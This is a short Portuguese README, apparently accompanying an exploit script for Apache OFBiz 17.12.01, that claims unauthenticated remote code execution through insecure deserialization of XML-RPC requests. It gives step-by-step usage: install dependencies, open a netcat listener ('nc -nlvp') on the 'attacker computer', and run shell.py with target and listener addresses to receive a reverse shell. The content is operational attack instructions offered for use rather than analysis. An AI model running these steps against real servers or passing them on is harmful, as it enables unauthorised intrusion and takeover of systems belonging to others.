
ApacheOfBiz 17.12.01 - Execução Remota de Código Não Autorizada
ApacheOfBiz 17.12.01 - Execução Remota de Código Não Autorizada
As requisições XML-RPC são vulneráveis à desserialização insegura.
pip3 install -r requeriments.txt
nc -nlvp <port> # computador atacante
python3 shell.py -i <remote IP> -p <remote port> -li <local IP> -lp <local port>
Você deve ter um shell no seu listener nc
